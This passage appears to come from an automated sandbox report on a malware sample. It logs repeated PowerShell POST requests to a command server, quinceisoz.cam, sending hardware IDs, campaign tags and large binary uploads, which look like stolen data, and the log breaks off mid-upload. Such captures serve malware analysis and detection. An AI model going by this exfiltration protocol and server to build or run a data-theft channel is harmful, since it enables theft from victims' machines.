                                                      Data Ascii: 4VrF3Wd6G/8J9yX+j0xPSDQxv1kb3SbmShP3DXBnzvW2yYKMoeIL+Qp46rDLyQ/ZPXT6CARBP6MZRKSE/WxF9PMaSUy06tovGrZ1Kx+BiIr1t75YXBArpkqTZAS+LcZnIVrCXWd6Cn4OtCb83IkNSGTnr4tERL+lS9a3z347RzSxWsae9zoPrJyjtq0LGN3ZpTT7DFXSaiXYnTsH+2mCt+JGggx070r4i3jqtksJD8lkeHoIFFEudRrCspyp+E3


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.749979104.21.112.14437508C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-08 12:56:35 UTC274OUTPOST /api HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: multipart/form-data; boundary=65JI2K73L1TM
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                      Content-Length: 12808
                                                      Host: quinceisoz.cam
                                                      2025-01-08 12:56:35 UTC12808OUTData Raw: 2d 2d 36 35 4a 49 32 4b 37 33 4c 31 54 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 42 31 35 31 30 43 38 32 42 32 35 42 34 43 42 31 38 34 46 34 44 30 42 37 30 45 42 34 32 43 31 0d 0a 2d 2d 36 35 4a 49 32 4b 37 33 4c 31 54 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 35 4a 49 32 4b 37 33 4c 31 54 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 35 35 0d 0a 2d 2d 36 35 4a 49 32 4b 37 33 4c 31 54 4d 0d 0a
                                                      Data Ascii: --65JI2K73L1TMContent-Disposition: form-data; name="hwid"3B1510C82B25B4CB184F4D0B70EB42C1--65JI2K73L1TMContent-Disposition: form-data; name="pid"2--65JI2K73L1TMContent-Disposition: form-data; name="lid"WG6I6S--web55--65JI2K73L1TM
                                                      2025-01-08 12:56:36 UTC1134INHTTP/1.1 200 OK
                                                      Date: Wed, 08 Jan 2025 12:56:36 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: PHPSESSID=cbf6db4upuouesfqhfm4nb9gpq; expires=Sun, 04 May 2025 06:43:15 GMT; Max-Age=9999999; path=/
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      X-Frame-Options: DENY
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      cf-cache-status: DYNAMIC
                                                      vary: accept-encoding
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BVtkKBzYdccqOtIFMQ4FPFZ8Qg%2FrJtqPmRx54hAr6pbbNAPoX8UsTnA%2BfbBWH5e6YYaIwwt0riauX%2BStZvM%2BlSbofeXyDopmuHj5CmnViVhhNqu%2FbfikxGWHOaOv2NYX0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8fec5938592f43b3-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1545&rtt_var=614&sent=9&recv=18&lost=0&retrans=0&sent_bytes=3045&recv_bytes=13740&delivery_rate=2599406&cwnd=204&unsent_bytes=0&cid=389c70449fc35e76&ts=843&x=0"
                                                      2025-01-08 12:56:36 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                      Data Ascii: fok 8.46.123.189
                                                      2025-01-08 12:56:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.749980104.21.112.14437508C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-08 12:56:37 UTC271OUTPOST /api HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: multipart/form-data; boundary=NQ8CFUDZV
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                      Content-Length: 15022
                                                      Host: quinceisoz.cam
                                                      2025-01-08 12:56:37 UTC15022OUTData Raw: 2d 2d 4e 51 38 43 46 55 44 5a 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 42 31 35 31 30 43 38 32 42 32 35 42 34 43 42 31 38 34 46 34 44 30 42 37 30 45 42 34 32 43 31 0d 0a 2d 2d 4e 51 38 43 46 55 44 5a 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4e 51 38 43 46 55 44 5a 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 35 35 0d 0a 2d 2d 4e 51 38 43 46 55 44 5a 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
                                                      Data Ascii: --NQ8CFUDZVContent-Disposition: form-data; name="hwid"3B1510C82B25B4CB184F4D0B70EB42C1--NQ8CFUDZVContent-Disposition: form-data; name="pid"2--NQ8CFUDZVContent-Disposition: form-data; name="lid"WG6I6S--web55--NQ8CFUDZVContent-Disp
                                                      2025-01-08 12:56:37 UTC1135INHTTP/1.1 200 OK
                                                      Date: Wed, 08 Jan 2025 12:56:37 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: PHPSESSID=kur2ir6c6q7jcmpu2q7jk2d31f; expires=Sun, 04 May 2025 06:43:16 GMT; Max-Age=9999999; path=/
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      X-Frame-Options: DENY
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      cf-cache-status: DYNAMIC
                                                      vary: accept-encoding
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JRP9%2F67jXrsFNbuOdTKpK2ZGdeXekCpdsEUBJSUu3Z6eL%2F6FP6BNYLmdj%2Bvd0huaORmLOaZUgHGtn%2B%2BqkIt00Gzh4VDYA49QziG%2FzzbG9yanqfrhfaQSsyl7OJ3YyqCiag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8fec5940bc42727b-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1992&min_rtt=1980&rtt_var=767&sent=10&recv=20&lost=0&retrans=0&sent_bytes=3043&recv_bytes=15951&delivery_rate=2105769&cwnd=235&unsent_bytes=0&cid=bb3dfd5763d66f57&ts=534&x=0"
                                                      2025-01-08 12:56:37 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                      Data Ascii: fok 8.46.123.189
                                                      2025-01-08 12:56:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.749981104.21.112.14437508C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-08 12:56:38 UTC276OUTPOST /api HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: multipart/form-data; boundary=24HSIUEZS9V3JT
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                      Content-Length: 20377
                                                      Host: quinceisoz.cam
                                                      2025-01-08 12:56:38 UTC15331OUTData Raw: 2d 2d 32 34 48 53 49 55 45 5a 53 39 56 33 4a 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 42 31 35 31 30 43 38 32 42 32 35 42 34 43 42 31 38 34 46 34 44 30 42 37 30 45 42 34 32 43 31 0d 0a 2d 2d 32 34 48 53 49 55 45 5a 53 39 56 33 4a 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 32 34 48 53 49 55 45 5a 53 39 56 33 4a 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 35 35 0d 0a 2d 2d 32 34 48 53 49 55 45 5a
                                                      Data Ascii: --24HSIUEZS9V3JTContent-Disposition: form-data; name="hwid"3B1510C82B25B4CB184F4D0B70EB42C1--24HSIUEZS9V3JTContent-Disposition: form-data; name="pid"3--24HSIUEZS9V3JTContent-Disposition: form-data; name="lid"WG6I6S--web55--24HSIUEZ
                                                      2025-01-08 12:56:38 UTC5046OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00
                                                      Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
                                                      2025-01-08 12:56:38 UTC1137INHTTP/1.1 200 OK
                                                      Date: Wed, 08 Jan 2025 12:56:38 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: PHPSESSID=cmf4ke065ajup256hhtg7hvtqp; expires=Sun, 04 May 2025 06:43:17 GMT; Max-Age=9999999; path=/
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      X-Frame-Options: DENY
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      cf-cache-status: DYNAMIC
                                                      vary: accept-encoding
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZQyM77x0u3ukd3cZVYv%2BWZqpNoEV4dA0gZ1MIITqK1zHFX69hbbbBPpQ71COEFBt%2Fb1fU%2Bo5nE8sHzb4WZwyl5jS%2FDhVYy%2Bs9GOJW%2F2FbJtI2Xt35%2Bsy0kIGWxJsbTWlxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8fec59474aaa43b3-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1547&rtt_var=603&sent=12&recv=25&lost=0&retrans=0&sent_bytes=3044&recv_bytes=21333&delivery_rate=2673992&cwnd=204&unsent_bytes=0&cid=8e070102f759cc52&ts=643&x=0"
                                                      2025-01-08 12:56:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                      Data Ascii: fok 8.46.123.189
                                                      2025-01-08 12:56:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.749982104.21.112.14437508C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-08 12:56:39 UTC275OUTPOST /api HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: multipart/form-data; boundary=X6R860G69PEVMY
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                      Content-Length: 1210
                                                      Host: quinceisoz.cam
                                                      2025-01-08 12:56:39 UTC1210OUTData Raw: 2d 2d 58 36 52 38 36 30 47 36 39 50 45 56 4d 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 42 31 35 31 30 43 38 32 42 32 35 42 34 43 42 31 38 34 46 34 44 30 42 37 30 45 42 34 32 43 31 0d 0a 2d 2d 58 36 52 38 36 30 47 36 39 50 45 56 4d 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 58 36 52 38 36 30 47 36 39 50 45 56 4d 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 35 35 0d 0a 2d 2d 58 36 52 38 36 30 47 36
                                                      Data Ascii: --X6R860G69PEVMYContent-Disposition: form-data; name="hwid"3B1510C82B25B4CB184F4D0B70EB42C1--X6R860G69PEVMYContent-Disposition: form-data; name="pid"1--X6R860G69PEVMYContent-Disposition: form-data; name="lid"WG6I6S--web55--X6R860G6
                                                      2025-01-08 12:56:39 UTC1124INHTTP/1.1 200 OK
                                                      Date: Wed, 08 Jan 2025 12:56:39 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: PHPSESSID=vl4evfrup0akccj8drebluijkj; expires=Sun, 04 May 2025 06:43:18 GMT; Max-Age=9999999; path=/
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      X-Frame-Options: DENY
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      cf-cache-status: DYNAMIC
                                                      vary: accept-encoding
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ydcPSldgU14%2BjkbQppu7MKDN3vhTZh4rUWSsGsavMfqTlfc9oBRv1YgbzB%2BcYIQov09O3nMVbMmwjlbdDBDUeRJasZbgDSRB7TRI91rUixUhssxx7RfKJw0NUNUzukZOlQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8fec594f884c0f5b-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1725&min_rtt=1698&rtt_var=656&sent=6&recv=8&lost=0&retrans=0&sent_bytes=3044&recv_bytes=2121&delivery_rate=2579505&cwnd=222&unsent_bytes=0&cid=bea4a418744965bd&ts=443&x=0"
                                                      2025-01-08 12:56:39 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                      Data Ascii: fok 8.46.123.189
                                                      2025-01-08 12:56:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.749983104.21.112.14437508C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-08 12:56:40 UTC275OUTPOST /api HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: multipart/form-data; boundary=95TPMI7T1E56
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                      Content-Length: 585408
                                                      Host: quinceisoz.cam
                                                      2025-01-08 12:56:40 UTC15331OUTData Raw: 2d 2d 39 35 54 50 4d 49 37 54 31 45 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 42 31 35 31 30 43 38 32 42 32 35 42 34 43 42 31 38 34 46 34 44 30 42 37 30 45 42 34 32 43 31 0d 0a 2d 2d 39 35 54 50 4d 49 37 54 31 45 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 35 54 50 4d 49 37 54 31 45 35 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 57 47 36 49 36 53 2d 2d 77 65 62 35 35 0d 0a 2d 2d 39 35 54 50 4d 49 37 54 31 45 35 36 0d 0a
                                                      Data Ascii: --95TPMI7T1E56Content-Disposition: form-data; name="hwid"3B1510C82B25B4CB184F4D0B70EB42C1--95TPMI7T1E56Content-Disposition: form-data; name="pid"1--95TPMI7T1E56Content-Disposition: form-data; name="lid"WG6I6S--web55--95TPMI7T1E56
                                                      2025-01-08 12:56:40 UTC15331OUTData Raw: fd 58 82 fb 8f 9e be a8 e1 d8 c6 7d 98 5a 28 9f c1 dd ac 96 e9 c6 6b 2d c7 f0 c2 95 0a 83 4c f5 a9 b7 a5 80 32 39 ae 75 bb a2 25 d3 7a e0 c4 6a ce d9 60 6a 2d 13 0b ff e4 f8 cc 1c 2c 1f ae d9 8b 83 0b 6b aa bb aa ca 17 7f 1c 06 27 5b 0e f7 99 f6 14 5c 9d 79 75 ac ff ff 6f 03 b0 4f 2c f1 80 6f 83 67 b1 10 b7 b1 73 97 6e 31 e2 f0 37 58 5c 96 d7 fe bd c3 32 c0 1e 68 76 b8 80 52 34 68 24 93 7b 74 80 57 13 17 7c 80 a1 5b a7 8f c6 7a 27 33 0b 75 fc f6 a2 b6 1f 56 af 9c e7 82 2a 2d c2 0e e4 fe 2e 5d ca 74 19 f0 fe 98 41 e5 65 01 c0 bf d3 6d ae c5 67 98 2e 36 57 a7 c6 a4 f2 63 9e 6c 14 26 42 6f fa 95 c6 79 f3 2f 21 0c 35 bb 11 2e fe 29 a0 b9 7d 36 50 ff 81 81 cb 92 69 aa 37 66 5a ad 0f 9e e2 ea 2a 2f c0 c2 88 14 2b 2c 39 90 f6 72 9f d7 2e 92 5f 55 4b ce 94 93 d6
                                                      Data Ascii: X}Z(k-L29u%zj`j-,k'[\yuoO,ogsn17X\2hvR4h${tW|[z'3uV*-.]tAemg.6Wcl&Boy/!5.)}6Pi7fZ*/+,9r._UK
                                                      2025-01-08 12:56:40 UTC15331OUTData Raw: cf b6 88 d7 c1 63 85 c1 9d ab 50 76 63 a8 33 7c 6c 7c b2 18 11 78 2c a1 c3 36 4d d9 19 e2 ae 83 a1 ee bb 89 c2 41 ca 6d 2d 79 48 8d 5d d6 0b b5 3a f7 af d9 65 ae bf 22 2b 9e 8b d3 4e 09 52 fd 36 a0 b1 9d a5 5a 9f e0 ec cc 23 5b 64 dd 6b 1f d3 94 2d 5d 40 5f a4 00 36 12 e3 55 fa d8 6a 41 d8 90 42 d1 ae ba 6d ae ef d4 d1 21 72 bf c1 a9 0e 42 85 6f fe d7 9a 98 9b d2 d6 e8 2f cc df f7 68 e8 79 79 a1 e2 2a 9d 6e 39 7c 9d e7 e4 1d 86 b2 22 78 76 82 4b aa 60 47 df 04 e6 de 45 f5 9a 7f 0a 82 15 b0 b2 42 ad 52 91 88 0e 8b d4 4f 47 cf 1b 76 af b9 5c 8d e0 83 18 77 ae 1d a4 f2 6e 5d d9 49 0d d1 a8 70 9e b7 65 16 d0 16 cf b1 98 51 02 15 38 99 40 c6 ce b2 55 72 c5 1f 7f e7 06 8a 95 67 5f 07 f8 c9 80 ce 8d fe 01 61 2b fb 5f 6d 5a 13 52 56 15 8e 25 b1 84 19 bd b4 be bf
                                                      Data Ascii: cPvc3|l|x,6MAm-yH]:e"+NR6Z#[dk-]@_6UjABm!rBo/hyy*n9|"xvK`GEBROGv\wn]IpeQ8@Urg_a+_mZRV%
                                                      2025-01-08 12:56:40 UTC15331OUTData Raw: 14 58 9e df 4f 4b 9a 3a b1 7b 6e a1 5e ce 2c a1 72 ec 16 29 85 56 b5 07 0c 3b 07 6d bf 5f f5 5b 09 c9 c0 17 04 c7 ae 1e 65 2f 24 cf 98 0c 10 29 b2 3c 86 cd 77 df 68 e2 18 b3 5f 76 7b d5 ea a5 04 56 41 a8 db c1 8e 02 45 7f 70 70 a2 ac c4 72 7f ce f8 ba d4 c2 d9 f1 aa e4 7e 34 e0 cc 05 d9 ad 53 d7 5a f4 6d 25 54 be d5 51 b8 f9 eb de 13 df 58 a0 41 8d 39 b7 ec ab d0 e7 76 bf 8f c2 1a c5 c0 49 cb f7 1e a7 3e 13 e7 ad 5e de 65 b5 c5 9c 37 e2 49 ba 38 41 97 0b a6 ee 0e 70 49 d2 02 eb 9a 51 ca 39 56 17 58 9b cf 58 d6 3a 3b 50 80 64 29 0d de ac 8b 7b 01 ce ba 88 ba fb fa 8f 57 29 42 b0 4f d4 7a b0 32 db 59 8f 0b 88 0e 33 5c eb 83 9a 65 b3 50 9e 72 7d 41 53 7a 96 72 55 37 37 35 00 77 df 29 e1 39 2c 08 e7 15 3c 64 57 3c b2 3c 26 81 86 bd 3b 06 74 fd 2a 89 a8 68 e6
                                                      Data Ascii: XOK:{n^,r)V;m_[e/$)<wh_v{VAEppr~4SZm%TQXA9vI>^e7I8ApIQ9VXX:;Pd){W)BOz2Y3\ePr}ASzrU775w)9,<dW<<&;t*h
                                                      2025-01-08 12:56:40 UTC15331OUTData Raw: 3d 05 a0 40 80 2c c8 00 1c 80 1f db 31 19 89 46 7c 4a 24 98 f7 83 10 95 ca 41 76 2a 3c a2 6e 40 e7 59 5e 0f 87 81 7e 4f f0 cf b5 f8 0c 71 25 65 81 78 46 4b 75 55 8b 4e 0a 04 4b 41 07 6f b3 7d d0 e0 e6 32 a2 75 db 91 b2 08 bf 33 1f 40 e1 28 72 a0 80 fe ba e2 4e 1c 62 e7 7a aa ab 0b 7a 14 31 0b 05 25 ea ca ab ae 8d ba 06 db 8d 0b 02 16 9e 4f 02 3e 88 fc 2c a4 f3 b6 20 62 c0 a6 3c 76 80 e1 d2 50 f2 d4 f4 f9 31 87 0c 48 c2 48 5c fa ac 82 fc b1 e2 7a 09 44 2a 44 b3 6e c8 24 c2 71 a9 67 7b 83 4a d5 64 55 b1 90 40 cc 25 33 fd d7 b3 ce 99 2a b2 a1 e1 fe 93 28 8b 43 62 a7 cd 8c ad 8c f7 68 b0 b6 0a 25 e9 29 6a 60 ff 70 a3 eb d6 9f 22 4a 8d 7e dd 03 6e be 3f 90 4b a3 de f8 46 9b 64 88 d6 b6 d6 84 a0 e1 26 01 cc 5b 74 81 21 46 62 3b ad ad 38 47 09 fa 25 46 21 1f ab
                                                      Data Ascii: =@,1F|J$Av*<n@Y^~Oq%exFKuUNKAo}2u3@(rNbzz1%O>, b<vP1HH\zD*Dn$qg{JdU@%3*(Cbh%)j`p"J~n?KFd&[t!Fb;8G%F!
                                                      2025-01-08 12:56:40 UTC15331OUTData Raw: ea 9d bd 86 01 95 ff a2 a9 c9 1a 84 7a 08 68 61 37 3b f1 a7 83 8a b3 1f f9 b9 07 1d ef 2d 18 f1 e5 5f 59 5f 18 5a 78 fd a2 59 6f e5 5c 61 60 c7 23 97 ef 9f 31 19 be 47 29 92 39 d6 eb ea ad 8f 8c 59 5a 1c 11 1b 67 30 16 18 c7 94 f9 80 e1 9c bf 30 40 4c 11 07 d3 c4 02 3e 7f ce a2 ca 8d 8a 85 b1 e9 ba c4 d0 04 e4 d2 67 ef ed 59 66 a5 47 62 9c 36 9a 1a be 6c 03 ad ea 53 43 a9 14 40 3b 32 98 a7 6c 42 26 df cc 7d c8 f9 a2 04 f5 55 49 e0 e5 21 d0 3d 75 8e 7e 60 a0 d8 e9 fa 29 06 ac 9c e1 f8 f8 c0 2c 2c 6d 64 90 6e b4 40 69 61 f4 ab 8e 72 64 07 21 e6 0c 04 dc be 9c 7c 03 4b f9 fa e4 a7 36 2a fc ac a9 5d 58 58 56 d6 27 13 41 9a 25 fc 0a 51 54 6c 70 a9 d5 00 82 2e 2f 46 d6 8d a4 04 e0 f2 45 bc 9e 13 e4 c8 45 a7 c3 b9 80 d2 e4 0a f5 c2 f8 6e a4 7c 55 00 23 ff 8a b8
                                                      Data Ascii: zha7;-_Y_ZxYo\a`#1G)9YZg00@L>gYfGb6lSC@;2lB&}UI!=u~`),,mdn@iard!|K6*]XXV'A%QTlp./FEEn|U#
                                                      2025-01-08 12:56:40 UTC15331OUTData Raw: 0d 31 79 e1 45 cc 56 ee 8a 79 1c 35 ae 66 6d 35 4e 67 7e 83 2e 80 3d 7c 32 49 a2 0a 9f 1f d7 44 f4 65 0b 70 4d 9f 3a 83 21 10 a4 a1 b4 3a 8a 5c b6 d0 ea ed af ca 32 b0 21 77 e6 12 26 4d cf 18 43 ce 82 ba cb 98 8a e0 32 59 fc d5 82 b1 31 de 31 55 0b 25 b2 3c a5 e7 0e ae 42 00 31 0b b1 04 c0 f5 18 3e fa 59 1e e4 45 d1 b0 0c 8b e0 b8 33 04 54 98 22 af d7 b1 ea 93 f3 a6 f0 ff 98 d4 4c 88 3a 34 73 f8 a7 cc a8 c2 64 c1 22 7f 3e ee 4f 88 d1 fd a2 9e 2e 23 ea ff 9a 57 bd 77 dd 2e 27 e0 2e 3a e2 37 6e db e4 7f 8d 3a f1 a4 10 15 11 af fc 70 5d 6f 9a 26 05 91 0f c1 d5 8e c0 48 41 90 b2 3b 06 d9 f1 ff f8 42 d7 79 09 cd df 3d 2d ba e4 06 1f 5e a3 52 c3 9e 89 d7 44 be ae e7 02 4a ab 6d 70 ea c6 7c 13 c9 da 70 ff 27 3f 3c b2 6a e9 31 8f 62 6d 28 5d 8f aa 26 ec e6 59 87
                                                      Data Ascii: 1yEVy5fm5Ng~.=|2IDepM:!:\2!w&MC2Y11U%<B1>YE3T"L:4sd">O.#Ww.'.:7n:p]o&HA;By=-^RDJmp|p'?<j1bm(]&Y
